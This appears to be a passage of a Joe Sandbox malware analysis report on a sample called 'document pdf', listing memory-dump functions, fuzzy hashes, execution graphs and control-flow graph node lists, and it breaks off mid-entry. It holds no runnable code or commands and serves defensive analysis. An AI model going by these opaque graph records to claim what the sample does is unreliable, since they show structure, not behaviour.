                                                                                                                        • Snapshot File: hcaresult_0_2_3060000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 27f74e2372469be995e8063c812a6cd540a9073e2e0f241e02fcbfe14f7c4768
                                                                                                                        • Instruction ID: 2c63e6383fe8daa80c21d3ce832e8137866ad32684917c2dfc5ec33f1167dacd
                                                                                                                        • Opcode Fuzzy Hash: 27f74e2372469be995e8063c812a6cd540a9073e2e0f241e02fcbfe14f7c4768
                                                                                                                        • Instruction Fuzzy Hash: 6CA16B36A0130A8FCF05DFB4D9405DEBBB2FF84300B15856AE801AF269DB75E955CB80
                                                                                                                        Function 05710680 Relevance: .2, Instructions: 221COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2275364495.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_5710000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b121ed57cea4494bca7c39ab26d6d88db2cb1d9021690b45d435ca6d8fe8d13c
                                                                                                                        • Instruction ID: 550dda1dbfe80abbae24d236a95534aafc0f50d806bd1e12e3518b031409dc34
                                                                                                                        • Opcode Fuzzy Hash: b121ed57cea4494bca7c39ab26d6d88db2cb1d9021690b45d435ca6d8fe8d13c
                                                                                                                        • Instruction Fuzzy Hash: AAC1F8F08037458FD726EF66EC481897BB1BB86314F51430AD2616B2E9DBBC158ACF84

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:16.6%
                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                        Signature Coverage:26.5%
                                                                                                                        Total number of Nodes:34
                                                                                                                        Total number of Limit Nodes:6
                                                                                                                        execution_graph 20835 6699c70 20836 6699c9d 20835->20836 20838 669bb7f 20836->20838 20840 6699fa6 20836->20840 20841 6699328 20836->20841 20839 6699328 LdrInitializeThunk 20839->20840 20840->20838 20840->20839 20842 669933a 20841->20842 20844 669933f 20841->20844 20842->20840 20843 6699a69 LdrInitializeThunk 20843->20842 20844->20842 20844->20843 20845 f1e018 20846 f1e024 20845->20846 20852 6692968 20846->20852 20848 f1e61f 20853 669298a 20852->20853 20854 f1e0c3 20853->20854 20856 6699328 LdrInitializeThunk 20853->20856 20866 6699548 20853->20866 20872 669992c 20853->20872 20858 669fc68 20854->20858 20862 669fc5f 20854->20862 20856->20854 20859 669fc8a 20858->20859 20860 6699548 2 API calls 20859->20860 20861 669fd3a 20859->20861 20860->20861 20861->20848 20863 669fc68 20862->20863 20864 6699548 2 API calls 20863->20864 20865 669fd3a 20863->20865 20864->20865 20865->20848 20871 6699579 20866->20871 20867 66996d9 20867->20854 20868 6699924 LdrInitializeThunk 20868->20867 20870 6699328 LdrInitializeThunk 20870->20871 20871->20867 20871->20868 20871->20870 20876 66997e3 20872->20876 20873 6699924 LdrInitializeThunk 20875 6699a81 20873->20875 20875->20854 20876->20873 20877 6699328 LdrInitializeThunk 20876->20877 20877->20876

                                                                                                                        Executed Functions

                                                                                                                        Function 06699548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 974 6699548-6699577 975 6699579 974->975 976 669957e-6699614 974->976 975->976 978 66996b3-66996b9 976->978 979 6699619-669962c 978->979 980 66996bf-66996d7 978->980 981 669962e 979->981 982 6699633-6699684 979->982 983 66996d9-66996e6 980->983 984 66996eb-66996fe 980->984 981->982 1000 6699697-66996a9 982->1000 1001 6699686-6699694 982->1001 985 6699a81-6699b7e 983->985 986 6699700 984->986 987 6699705-6699721 984->987 992 6699b80-6699b85 985->992 993 6699b86-6699b90 985->993 986->987 990 6699728-669974c 987->990 991 6699723 987->991 997 669974e 990->997 998 6699753-6699785 990->998 991->990 992->993 997->998 1006 669978c-66997ce 998->1006 1007 6699787 998->1007 1003 66996ab 1000->1003 1004 66996b0 1000->1004 1001->980 1003->1004 1004->978 1009 66997d0 1006->1009 1010 66997d5-66997de 1006->1010 1007->1006 1009->1010 1011 6699a06-6699a0c 1010->1011 1012 66997e3-6699808 1011->1012 1013 6699a12-6699a25 1011->1013 1014 669980a 1012->1014 1015 669980f-6699846 1012->1015 1016 6699a2c-6699a47 1013->1016 1017 6699a27 1013->1017 1014->1015 1025 6699848 1015->1025 1026 669984d-669987f 1015->1026 1018 6699a49 1016->1018 1019 6699a4e-6699a62 1016->1019 1017->1016 1018->1019 1023 6699a69-6699a7f LdrInitializeThunk 1019->1023 1024 6699a64 1019->1024 1023->985 1024->1023 1025->1026 1028 6699881-66998a6 1026->1028 1029 66998e3-66998f6 1026->1029 1030 66998a8 1028->1030 1031 66998ad-66998db 1028->1031 1032 66998f8 1029->1032 1033 66998fd-6699922 1029->1033 1030->1031 1031->1029 1032->1033 1036 6699931-6699969 1033->1036 1037 6699924-6699925 1033->1037 1038 669996b 1036->1038 1039 6699970-66999d1 call 6699328 1036->1039 1037->1013 1038->1039 1045 66999d8-66999fc 1039->1045 1046 66999d3 1039->1046 1049 66999fe 1045->1049 1050 6699a03 1045->1050 1046->1045 1049->1050 1050->1011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2ee623a4bb2d4c80720d8ab550a512c3c3b4f36cbeb49638cbf841ee4f6ca95f
                                                                                                                        • Instruction ID: b0ac7767a59025f45ddd9c232cd7ad2e30026042a8d62ed11daa01df65111c88
                                                                                                                        • Opcode Fuzzy Hash: 2ee623a4bb2d4c80720d8ab550a512c3c3b4f36cbeb49638cbf841ee4f6ca95f
                                                                                                                        • Instruction Fuzzy Hash: F3F1F674D01218CFEB54DFA9D884B9DFBB6BF88304F1482A9D808AB355DB719986CF50
                                                                                                                        Function 00F1C146 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1533 f1c146-f1c158 1534 f1c184 1533->1534 1535 f1c15a-f1c172 1533->1535 1536 f1c186-f1c18a 1534->1536 1539 f1c174-f1c179 1535->1539 1540 f1c17b-f1c17e 1535->1540 1539->1536 1541 f1c180-f1c182 1540->1541 1542 f1c18b-f1c199 1540->1542 1541->1534 1541->1535 1544 f1c19b-f1c19d 1542->1544 1545 f1c12f-f1c132 1542->1545 1546 f1c133-f1c134 1544->1546 1547 f1c19f-f1c1a1 1544->1547 1545->1546 1548 f1c137-f1c145 1546->1548 1547->1548 1549 f1c1a3-f1c1c8 1547->1549 1550 f1c1ca 1549->1550 1551 f1c1cf-f1c2ac call f141a0 call f13cc0 1549->1551 1550->1551 1561 f1c2b3-f1c2d4 call f15658 1551->1561 1562 f1c2ae 1551->1562 1564 f1c2d9-f1c2e4 1561->1564 1562->1561 1565 f1c2e6 1564->1565 1566 f1c2eb-f1c2ef 1564->1566 1565->1566 1567 f1c2f1-f1c2f2 1566->1567 1568 f1c2f4-f1c2fb 1566->1568 1569 f1c313-f1c357 1567->1569 1570 f1c302-f1c310 1568->1570 1571 f1c2fd 1568->1571 1575 f1c3bd-f1c3d4 1569->1575 1570->1569 1571->1570 1577 f1c3d6-f1c3fb 1575->1577 1578 f1c359-f1c36f 1575->1578 1584 f1c413 1577->1584 1585 f1c3fd-f1c412 1577->1585 1582 f1c371-f1c37d 1578->1582 1583 f1c399 1578->1583 1586 f1c387-f1c38d 1582->1586 1587 f1c37f-f1c385 1582->1587 1588 f1c39f-f1c3bc 1583->1588 1585->1584 1589 f1c397 1586->1589 1587->1589 1588->1575 1589->1588
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 0-3887548279
                                                                                                                        • Opcode ID: 410f4eb65012483ca3e166dd983e2df7f74bdd43df1d154bc30eb60f45af6874
                                                                                                                        • Instruction ID: 155ec86eaa201f02600667621cb44da6b6071df205d7146975bd49f96cf407fe
                                                                                                                        • Opcode Fuzzy Hash: 410f4eb65012483ca3e166dd983e2df7f74bdd43df1d154bc30eb60f45af6874
                                                                                                                        • Instruction Fuzzy Hash: 16A10775E44258DFDB14DFAAD884ADDBBF2BF89310F14806AD408AB361DB309886DF50
                                                                                                                        Function 00F1A088 Relevance: .9, Instructions: 900COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0695867480a99527af66ada38ae0090b39a3f2a9e5ee60b3d3d9802df8097022
                                                                                                                        • Instruction ID: 44a1217fcc15093307e3dc214ab28d72aa9cc41e8ff9cdd8da80ee0cdfa8b765
                                                                                                                        • Opcode Fuzzy Hash: 0695867480a99527af66ada38ae0090b39a3f2a9e5ee60b3d3d9802df8097022
                                                                                                                        • Instruction Fuzzy Hash: CF829A71A01209CFCB15CFA8C984AEEBBF2BF88310F158569E4059B2A5D735ED81DB52
                                                                                                                        Function 06690B30 Relevance: .7, Instructions: 709COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 2038 6690b30-6690b50 2039 6690b52 2038->2039 2040 6690b57-6690bd9 2038->2040 2039->2040 2042 6690c3e-6690c54 2040->2042 2043 6690bdb-6690be4 2042->2043 2044 6690c56-6690ca0 2042->2044 2045 6690beb-6690c34 2043->2045 2046 6690be6 2043->2046 2051 6690d0b-6690d0c 2044->2051 2052 6690ca2-6690ce3 2044->2052 2053 6690c3b 2045->2053 2054 6690c36 2045->2054 2046->2045 2055 6690d0d-6690d3e 2051->2055 2060 6690d05-6690d06 2052->2060 2061 6690ce5-6690d03 2052->2061 2053->2042 2054->2053 2059 6690d45-6690dac 2055->2059 2067 66916fe-6691733 2059->2067 2068 6690db2-6690dd3 2059->2068 2062 6690d07-6690d09 2060->2062 2061->2062 2062->2055 2071 66916db-66916f7 2068->2071 2072 6690dd8-6690de1 2071->2072 2073 66916fd 2071->2073 2074 6690de8-6690e4e 2072->2074 2075 6690de3 2072->2075 2073->2067 2079 6690e50 2074->2079 2080 6690e55-6690edf 2074->2080 2075->2074 2079->2080 2086 6690ef1-6690ef8 2080->2086 2087 6690ee1-6690ee8 2080->2087 2090 6690efa 2086->2090 2091 6690eff-6690f0c 2086->2091 2088 6690eea 2087->2088 2089 6690eef 2087->2089 2088->2089 2089->2091 2090->2091 2092 6690f0e 2091->2092 2093 6690f13-6690f1a 2091->2093 2092->2093 2094 6690f1c 2093->2094 2095 6690f21-6690f78 2093->2095 2094->2095 2098 6690f7a 2095->2098 2099 6690f7f-6690f96 2095->2099 2098->2099 2100 6690f98-6690f9f 2099->2100 2101 6690fa1-6690fa9 2099->2101 2102 6690faa-6690fb4 2100->2102 2101->2102 2103 6690fbb-6690fc4 2102->2103 2104 6690fb6 2102->2104 2105 66916ab-66916b1 2103->2105 2104->2103 2106 6690fc9-6690fd5 2105->2106 2107 66916b7-66916d1 2105->2107 2108 6690fdc-6690fe1 2106->2108 2109 6690fd7 2106->2109 2116 66916d8 2107->2116 2117 66916d3 2107->2117 2110 6690fe3-6690fef 2108->2110 2111 6691024-6691026 2108->2111 2109->2108 2114 6690ff1 2110->2114 2115 6690ff6-6690ffb 2110->2115 2113 669102c-6691040 2111->2113 2118 6691689-6691696 2113->2118 2119 6691046-669105b 2113->2119 2114->2115 2115->2111 2120 6690ffd-669100a 2115->2120 2116->2071 2117->2116 2123 6691697-66916a1 2118->2123 2121 669105d 2119->2121 2122 6691062-66910e8 2119->2122 2124 669100c 2120->2124 2125 6691011-6691022 2120->2125 2121->2122 2132 66910ea-6691110 2122->2132 2133 6691112 2122->2133 2126 66916a8 2123->2126 2127 66916a3 2123->2127 2124->2125 2125->2113 2126->2105 2127->2126 2134 669111c-669113c 2132->2134 2133->2134 2136 66912bb-66912c0 2134->2136 2137 6691142-669114c 2134->2137 2140 66912c2-66912e2 2136->2140 2141 6691324-6691326 2136->2141 2138 669114e 2137->2138 2139 6691153-669117c 2137->2139 2138->2139 2142 669117e-6691188 2139->2142 2143 6691196-6691198 2139->2143 2154 669130c 2140->2154 2155 66912e4-669130a 2140->2155 2144 669132c-669134c 2141->2144 2148 669118a 2142->2148 2149 669118f-6691195 2142->2149 2150 6691237-6691246 2143->2150 2145 6691683-6691684 2144->2145 2146 6691352-669135c 2144->2146 2153 6691685-6691687 2145->2153 2151 669135e 2146->2151 2152 6691363-669138c 2146->2152 2148->2149 2149->2143 2156 6691248 2150->2156 2157 669124d-6691252 2150->2157 2151->2152 2158 669138e-6691398 2152->2158 2159 66913a6-66913b4 2152->2159 2153->2123 2160 6691316-6691322 2154->2160 2155->2160 2156->2157 2161 669127c-669127e 2157->2161 2162 6691254-6691264 2157->2162 2164 669139a 2158->2164 2165 669139f-66913a5 2158->2165 2166 6691453-6691462 2159->2166 2160->2144 2163 6691284-6691298 2161->2163 2168 669126b-669127a 2162->2168 2169 6691266 2162->2169 2170 669119d-66911b8 2163->2170 2171 669129e-66912b6 2163->2171 2164->2165 2165->2159 2172 6691469-669146e 2166->2172 2173 6691464 2166->2173 2168->2163 2169->2168 2176 66911ba 2170->2176 2177 66911bf-6691229 2170->2177 2171->2153 2174 6691498-669149a 2172->2174 2175 6691470-6691480 2172->2175 2173->2172 2180 66914a0-66914b4 2174->2180 2178 6691482 2175->2178 2179 6691487-6691496 2175->2179 2176->2177 2194 669122b 2177->2194 2195 6691230-6691236 2177->2195 2178->2179 2179->2180 2181 66913b9-66913d4 2180->2181 2182 66914ba-6691523 2180->2182 2184 66913db-6691445 2181->2184 2185 66913d6 2181->2185 2192 669152c-669167f 2182->2192 2193 6691525-6691527 2182->2193 2199 669144c-6691452 2184->2199 2200 6691447 2184->2200 2185->2184 2196 6691680-6691681 2192->2196 2193->2196 2194->2195 2195->2150 2196->2107 2199->2166 2200->2199
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1523eca40363a7213da589f040d4cb79a054224c45f029e3791d3de1fa8e82f5
                                                                                                                        • Instruction ID: 9aed80a6c25ec46d58a074714153bbc45546d78f1f050acd85c09cbb2eea91da
                                                                                                                        • Opcode Fuzzy Hash: 1523eca40363a7213da589f040d4cb79a054224c45f029e3791d3de1fa8e82f5
                                                                                                                        • Instruction Fuzzy Hash: F872B174E012698FDB64DF69C980BEDBBB6BB49300F1481E9D809A7355DB349E82CF50
                                                                                                                        Function 00F169A0 Relevance: .5, Instructions: 515COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 38aea9da09dfb4ba623713ac0460184db10e23bf8b410b266845399371ace52c
                                                                                                                        • Instruction ID: 28a4210f9d2cf6f1dd773d6c9cb4e3a53aef707937fce4c5505220998be645fb
                                                                                                                        • Opcode Fuzzy Hash: 38aea9da09dfb4ba623713ac0460184db10e23bf8b410b266845399371ace52c
                                                                                                                        • Instruction Fuzzy Hash: 79127D70B002199FDB14DF69C894BAEBBF6BF88310F208569E445EB395DB349D81DB90
                                                                                                                        Function 00F16FC8 Relevance: .5, Instructions: 455COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3166 f16fc8-f16ffe 3299 f17000 call f169a0 3166->3299 3300 f17000 call f17118 3166->3300 3301 f17000 call f16fc8 3166->3301 3167 f17006-f1700c 3168 f1705c-f17060 3167->3168 3169 f1700e-f17012 3167->3169 3170 f17062-f17071 3168->3170 3171 f17077-f1708b 3168->3171 3172 f17021-f17028 3169->3172 3173 f17014-f17019 3169->3173 3176 f17073-f17075 3170->3176 3177 f1709d-f170a7 3170->3177 3178 f17093-f1709a 3171->3178 3296 f1708d call f19dd0 3171->3296 3297 f1708d call f1a0e8 3171->3297 3298 f1708d call f1a088 3171->3298 3174 f170fe-f1713b 3172->3174 3175 f1702e-f17035 3172->3175 3173->3172 3188 f17146-f17166 3174->3188 3189 f1713d-f17143 3174->3189 3175->3168 3179 f17037-f1703b 3175->3179 3176->3178 3180 f170b1-f170b5 3177->3180 3181 f170a9-f170af 3177->3181 3182 f1704a-f17051 3179->3182 3183 f1703d-f17042 3179->3183 3185 f170bd-f170f7 3180->3185 3186 f170b7 3180->3186 3181->3185 3182->3174 3187 f17057-f1705a 3182->3187 3183->3182 3185->3174 3186->3185 3187->3178 3195 f17168 3188->3195 3196 f1716d-f17174 3188->3196 3189->3188 3198 f174fc-f17505 3195->3198 3197 f17176-f17181 3196->3197 3199 f17187-f1719a 3197->3199 3200 f1750d-f17513 3197->3200 3205 f171b0-f171cb 3199->3205 3206 f1719c-f171aa 3199->3206 3207 f17514-f17519 3200->3207 3217 f171cd-f171d3 3205->3217 3218 f171ef-f171f2 3205->3218 3206->3205 3216 f17484-f1748b 3206->3216 3208 f1751b-f17521 3207->3208 3209 f1750c 3207->3209 3208->3207 3213 f17523-f17536 3208->3213 3209->3200 3210 f174f6-f174f9 3209->3210 3214 f174fa 3210->3214 3215 f1748d-f1748f 3210->3215 3214->3198 3214->3215 3219 f17491-f17496 3215->3219 3220 f1749e-f174a4 3215->3220 3216->3198 3216->3215 3223 f171d5 3217->3223 3224 f171dc-f171df 3217->3224 3221 f171f8-f171fb 3218->3221 3222 f1734c-f17352 3218->3222 3219->3220 3220->3200 3227 f174a6-f174ab 3220->3227 3221->3222 3230 f17201-f17207 3221->3230 3228 f17358-f1735d 3222->3228 3229 f1743e-f17441 3222->3229 3223->3222 3223->3224 3226 f17212-f17218 3223->3226 3223->3229 3225 f171e1-f171e4 3224->3225 3224->3226 3231 f171ea 3225->3231 3232 f1727e-f17284 3225->3232 3236 f1721a-f1721c 3226->3236 3237 f1721e-f17220 3226->3237 3233 f174f0-f174f3 3227->3233 3234 f174ad-f174b2 3227->3234 3228->3229 3238 f17447-f1744d 3229->3238 3239 f17508 3229->3239 3230->3222 3235 f1720d 3230->3235 3231->3229 3232->3229 3242 f1728a-f17290 3232->3242 3233->3239 3240 f174f5 3233->3240 3234->3239 3241 f174b4 3234->3241 3235->3229 3243 f1722a-f17233 3236->3243 3237->3243 3244 f17472-f17476 3238->3244 3245 f1744f-f17457 3238->3245 3239->3209 3240->3210 3246 f174bb-f174c0 3241->3246 3247 f17292-f17294 3242->3247 3248 f17296-f17298 3242->3248 3250 f17235-f17240 3243->3250 3251 f17246-f1726e 3243->3251 3244->3216 3252 f17478-f1747e 3244->3252 3245->3200 3249 f1745d-f1746c 3245->3249 3253 f174e2-f174e4 3246->3253 3254 f174c2-f174c4 3246->3254 3255 f172a2-f172b9 3247->3255 3248->3255 3249->3205 3249->3244 3250->3229 3250->3251 3271 f17362-f17398 3251->3271 3272 f17274-f17279 3251->3272 3252->3197 3252->3216 3253->3239 3261 f174e6-f174e9 3253->3261 3257 f174d3-f174d9 3254->3257 3258 f174c6-f174cb 3254->3258 3266 f172e4-f1730b 3255->3266 3267 f172bb-f172d4 3255->3267 3257->3200 3262 f174db-f174e0 3257->3262 3258->3257 3261->3233 3262->3253 3265 f174b6-f174b9 3262->3265 3265->3239 3265->3246 3266->3239 3277 f17311-f17314 3266->3277 3267->3271 3275 f172da-f172df 3267->3275 3278 f173a5-f173ad 3271->3278 3279 f1739a-f1739e 3271->3279 3272->3271 3275->3271 3277->3239 3280 f1731a-f17343 3277->3280 3278->3239 3283 f173b3-f173b8 3278->3283 3281 f173a0-f173a3 3279->3281 3282 f173bd-f173c1 3279->3282 3280->3271 3295 f17345-f1734a 3280->3295 3281->3278 3281->3282 3284 f173e0-f173e4 3282->3284 3285 f173c3-f173c9 3282->3285 3283->3229 3287 f173e6-f173ec 3284->3287 3288 f173ee-f1740d call f176f1 3284->3288 3285->3284 3289 f173cb-f173d3 3285->3289 3287->3288 3290 f17413-f17417 3287->3290 3288->3290 3289->3239 3291 f173d9-f173de 3289->3291 3290->3229 3293 f17419-f17435 3290->3293 3291->3229 3293->3229 3295->3271 3296->3178 3297->3178 3298->3178 3299->3167 3300->3167 3301->3167
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ee0108a9546e6280a17be40909f93d0ff01fce98eb00d58eadd2fab5930bba20
                                                                                                                        • Instruction ID: 3261ca3e19ded6f49d1699e79e16119de51c81a5fa19b34fb43960d1dfbd0a7c
                                                                                                                        • Opcode Fuzzy Hash: ee0108a9546e6280a17be40909f93d0ff01fce98eb00d58eadd2fab5930bba20
                                                                                                                        • Instruction Fuzzy Hash: E6027070A08359DFCB15DFA8C884AEEBBF2BF48310F158065E859A7261D735ED81EB50
                                                                                                                        Function 00F13E09 Relevance: .4, Instructions: 433COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3303 f13e09-f13e25 3304 f13e27-f13e29 3303->3304 3305 f13e2e-f13e3e 3303->3305 3306 f140cc-f140d3 3304->3306 3307 f13e40 3305->3307 3308 f13e45-f13e55 3305->3308 3307->3306 3310 f140b3-f140c1 3308->3310 3311 f13e5b-f13e69 3308->3311 3314 f140d4-f141ba 3310->3314 3316 f140c3-f140c7 call f102c8 3310->3316 3311->3314 3315 f13e6f 3311->3315 3385 f141c1-f142c9 call f12358 call f12368 call f12378 call f12388 call f102e4 3314->3385 3386 f141bc 3314->3386 3315->3314 3317 f13eb3-f13ed5 3315->3317 3318 f13f72-f13f9a 3315->3318 3319 f13e76-f13e88 3315->3319 3320 f14039-f14065 3315->3320 3321 f13eda-f13efb 3315->3321 3322 f13f9f-f13fc7 3315->3322 3323 f13f00-f13f21 3315->3323 3324 f14084-f140a5 call f128f0 3315->3324 3325 f14067-f14082 call f102d8 3315->3325 3326 f140a7-f140b1 3315->3326 3327 f13f26-f13f47 3315->3327 3328 f13e8d-f13eae 3315->3328 3329 f13f4c-f13f6d 3315->3329 3330 f13fcc-f14009 3315->3330 3331 f1400e-f14034 3315->3331 3316->3306 3317->3306 3318->3306 3319->3306 3320->3306 3321->3306 3322->3306 3323->3306 3324->3306 3325->3306 3326->3306 3327->3306 3328->3306 3329->3306 3330->3306 3331->3306 3404 f142cf-f1435f 3385->3404 3386->3385
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ff1c47580729c0d7eb250924aa8b8901056482df6019ec1fc0d71f2f09e91a27
                                                                                                                        • Instruction ID: 69bc89662595bc6a9f34bdefe5dedeeedb1a1c889487032a10cb7e1af4cd8d37
                                                                                                                        • Opcode Fuzzy Hash: ff1c47580729c0d7eb250924aa8b8901056482df6019ec1fc0d71f2f09e91a27
                                                                                                                        • Instruction Fuzzy Hash: 4CF17774F05249DFCB08DFB6D8946AEBBB2FFC8300B14856AE406AB354DB359842DB51
                                                                                                                        Function 06692968 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 3523 6692968-6692988 3524 669298a 3523->3524 3525 669298f-6692a20 3523->3525 3524->3525 3529 6692d72-6692da4 3525->3529 3530 6692a26-6692a36 3525->3530 3578 6692a39 call 6692dc8 3530->3578 3579 6692a39 call 669310e 3530->3579 3580 6692a39 call 6692dc2 3530->3580 3533 6692a3f-6692a4e 3581 6692a50 call 6699548 3533->3581 3582 6692a50 call 6699328 3533->3582 3583 6692a50 call 669992c 3533->3583 3534 6692a56-6692a72 3536 6692a79-6692a82 3534->3536 3537 6692a74 3534->3537 3538 6692d65-6692d6b 3536->3538 3537->3536 3539 6692d71 3538->3539 3540 6692a87-6692b01 3538->3540 3539->3529 3545 6692bbd-6692c18 3540->3545 3546 6692b07-6692b75 3540->3546 3557 6692c19-6692c67 3545->3557 3555 6692bb8-6692bbb 3546->3555 3556 6692b77-6692bb7 3546->3556 3555->3557 3556->3555 3562 6692c6d-6692d4f 3557->3562 3563 6692d50-6692d5b 3557->3563 3562->3563 3565 6692d5d 3563->3565 3566 6692d62 3563->3566 3565->3566 3566->3538 3578->3533 3579->3533 3580->3533 3581->3534 3582->3534 3583->3534
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 09592ba6f4233d4e81da0fbb440d71652f31c6c063838bb1dab3e96883c8bb80
                                                                                                                        • Instruction ID: 246c68901c145b7f78d71851d5658e8a40d70d18ee4f90c2506d1d1f40456ebc
                                                                                                                        • Opcode Fuzzy Hash: 09592ba6f4233d4e81da0fbb440d71652f31c6c063838bb1dab3e96883c8bb80
                                                                                                                        • Instruction Fuzzy Hash: EFC1D178E01218CFDB54DFA5C994B9DBBB2FF89300F1081A9D809AB365DB359A85CF10
                                                                                                                        Function 06692DC8 Relevance: .2, Instructions: 220COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d2f74c4f2ae3a3b5617537abd724e1ec58bd9408d7542b2df26efc442febda30
                                                                                                                        • Instruction ID: 81569ad8a75029851ec9d559dcf7f21d5784861d77f604e30a54c0d5eb50bce5
                                                                                                                        • Opcode Fuzzy Hash: d2f74c4f2ae3a3b5617537abd724e1ec58bd9408d7542b2df26efc442febda30
                                                                                                                        • Instruction Fuzzy Hash: A7A1F574D00218CFEB14DFA9C95879DBBB5FF88304F209269E408A73A1DB759985CF54
                                                                                                                        Function 06692DC2 Relevance: .2, Instructions: 218COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e15c3a35ca09e6e2d3c1644e1fb317e3547287d973deb176113c4702621276e
                                                                                                                        • Instruction ID: 44eebbfecedbe91048f676c91825a8059310c0f3a8a6edf044364c87250c4139
